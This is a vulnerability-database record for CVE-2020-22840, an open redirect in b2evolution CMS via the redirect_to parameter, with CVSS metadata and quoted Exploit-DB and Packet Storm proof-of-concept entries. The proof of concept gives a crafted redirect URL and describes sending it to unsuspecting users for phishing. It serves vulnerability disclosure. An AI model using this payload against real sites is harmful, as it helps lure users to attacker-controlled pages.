Description
Open redirect vulnerability in b2evolution CMS version prior to 6.11.6 allows an attacker to perform malicious open redirects to an attacker controlled resource via redirect_to parameter in email_passthrough.php.
Affected Software
Related
{"id": "CVE-2020-22840", "vendorId": null, "type": "cve", "bulletinFamily": "NVD", "title": "CVE-2020-22840", "description": "Open redirect vulnerability in b2evolution CMS version prior to 6.11.6 allows an attacker to perform malicious open redirects to an attacker controlled resource via redirect_to parameter in email_passthrough.php.", "published": "2021-02-09T14:15:00", "modified": "2021-02-17T20:24:00", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:N"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:N", "accessVector": "NETWORK", "accessComplexity": "MEDIUM", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "NONE", "baseScore": 5.8}, "severity": "MEDIUM", "exploitabilityScore": 8.6, "impactScore": 4.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": true}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-22840", "reporter": "cve@mitre.org", "references": ["https://github.com/b2evolution/b2evolution/issues/102", "http://packetstormsecurity.com/files/161362/b2evolution-CMS-6.11.6-Open-Redirection.html", "https://www.exploit-db.com/exploits/49554"], "cvelist": ["CVE-2020-22840"], "immutableFields": [], "lastseen": "2022-03-23T15:13:22", "viewCount": 31, "enchantments": {"dependencies": {"references": [{"type": "exploitdb", "idList": ["EDB-ID:49554"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:161362"]}], "rev": 4}, "score": {"value": 5.4, "vector": "NONE"}, "twitter": {"counter": 2, "modified": "2021-02-12T14:50:39", "tweets": [{"link": "https://twitter.com/threatintelctr/status/1362139422691581962", "text": " NEW: CVE-2020-22840 Open redirect vulnerability in b2evolution CMS version prior to 6.11.6 allows an attacker to perform malicious open redirects to an attacker controlled resource via redirect_to parameter in ... (click for more) Severity: MEDIUM https://t.co/MRd3bXTcGm?amp=1"}, {"link": "https://twitter.com/threatintelctr/status/1362139422691581962", "text": " NEW: CVE-2020-22840 Open redirect vulnerability in b2evolution CMS version prior to 6.11.6 allows an attacker to perform malicious open redirects to an attacker controlled resource via redirect_to parameter in ... (click for more) Severity: MEDIUM https://t.co/MRd3bXTcGm?amp=1"}]}, "backreferences": {"references": [{"type": "exploitdb", "idList": ["EDB-ID:49554"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:161362"]}]}, "exploitation": null, "vulnersScore": 5.4}, "_state": {"dependencies": 0}, "_internal": {}, "cna_cvss": {"cna": null, "cvss": {}}, "cpe": [], "cpe23": [], "cwe": ["CWE-601"], "affectedSoftware": [{"cpeName": "b2evolution:b2evolution", "version": "6.11.6", "operator": "lt", "name": "b2evolution"}], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"operator": "OR", "children": [], "cpe_match": [{"vulnerable": true, "cpe23Uri": "cpe:2.3:a:b2evolution:b2evolution:6.11.6:*:*:*:*:*:*:*", "versionEndExcluding": "6.11.6", "cpe_name": []}]}]}, "extraReferences": [{"url": "https://github.com/b2evolution/b2evolution/issues/102", "name": "https://github.com/b2evolution/b2evolution/issues/102", "refsource": "MISC", "tags": ["Third Party Advisory"]}, {"url": "http://packetstormsecurity.com/files/161362/b2evolution-CMS-6.11.6-Open-Redirection.html", "name": "http://packetstormsecurity.com/files/161362/b2evolution-CMS-6.11.6-Open-Redirection.html", "refsource": "MISC", "tags": ["Exploit", "Third Party Advisory", "VDB Entry"]}, {"url": "https://www.exploit-db.com/exploits/49554", "name": "https://www.exploit-db.com/exploits/49554", "refsource": "MISC", "tags": ["Exploit", "Third Party Advisory", "VDB Entry"]}]}
{"packetstorm": [{"lastseen": "2021-02-10T15:42:20", "description": "", "published": "2021-02-10T00:00:00", "type": "packetstorm", "title": "b2evolution CMS 6.11.6 Open Redirection", "bulletinFamily": "exploit", "cvelist": ["CVE-2020-22840"], "modified": "2021-02-10T00:00:00", "id": "PACKETSTORM:161362", "href": "https://packetstormsecurity.com/files/161362/b2evolution-CMS-6.11.6-Open-Redirection.html", "sourceData": "`# Exploit Title: *Open redirect in b2evolution CMS 6.11.6 redirect_to \nparameter in email_passthrough.php* \n# Google Dork: N/A \n# Date: 10/02/2021 \n# Exploit Author: Soham Bakore, Nakul Ratti \n# Vendor Homepage: https://b2evolution.net/ \n# Software Link: \nhttps://b2evolution.net/downloads/6-11-6-stable?download=12405 \n# Version: 6.11.6 \n# Tested on: latest version of Chrome, Firefox on Windows and Linux \n# CVE : *CVE-2020-22840* \n \nVulnerable File: \n-------------------------- \nhttp://host/htsrv/email_passthrough.php <http://host/evoadm.php> \n \nVulnerable Issue: \n-------------------------- \nredirect_to parameter has no input validation/domain whitelisting. \n \n--------------------------Proof of Concept----------------------- \nSteps to Reproduce: \n \n1. Send the following link : \n*http://127.0.0.1/htsrv/email_passthrough.php?email_ID=1&type=link&email_key=5QImTaEHxmAzNYyYvENAtYHsFu7fyotR&redirect_to=http%3A%2F%2Fgoogle.com \n<http://127.0.0.1/htsrv/email_passthrough.php?email_ID=1&type=link&email_key=5QImTaEHxmAzNYyYvENAtYHsFu7fyotR&redirect_to=http%3A%2F%2Fgoogle.com>* \nto \nthe unsuspecting user \n2. The user will be redirected to Google.com or any other attacker \ncontrolled domain \n3. This can be used to perform malicious phishing campaigns on unsuspecting \nusers \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/161362/b2evolutioncms6116-redirect.txt"}], "exploitdb": [{"lastseen": "2022-05-13T17:39:53", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2021-02-11T00:00:00", "type": "exploitdb", "title": "b2evolution 6.11.6 - 'redirect_to' Open Redirect", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-22840"], "modified": "2021-02-11T00:00:00", "id": "EDB-ID:49554", "href": "https://www.exploit-db.com/exploits/49554", "sourceData": "# Exploit Title: b2evolution 6.11.6 - 'redirect_to' Open Redirect\r\n# Date: 10/02/2021\r\n# Exploit Author: Soham Bakore, Nakul Ratti\r\n# Vendor Homepage: https://b2evolution.net/\r\n# Software Link: https://b2evolution.net/downloads/6-11-6-stable?download=12405\r\n# Version: 6.11.6\r\n# Tested on: latest version of Chrome, Firefox on Windows and Linux\r\n# CVE : CVE-2020-22840\r\n\r\n\r\n--------------------------Proof of Concept-----------------------\r\n\r\n\r\n1. Send the following link : http://127.0.0.1/htsrv/email_passthrough.php?email_ID=1&type=link&email_key=5QImTaEHxmAzNYyYvENAtYHsFu7fyotR&redirect_to=http%3A%2F%2Fgoogle.com to the unsuspecting user\r\n2. The user will be redirected to Google.com or any other attacker controlled domain\r\n3. This can be used to perform malicious phishing campaigns on unsuspecting users", "sourceHref": "https://www.exploit-db.com/download/49554", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:N"}}]}
CVE-2020-22840
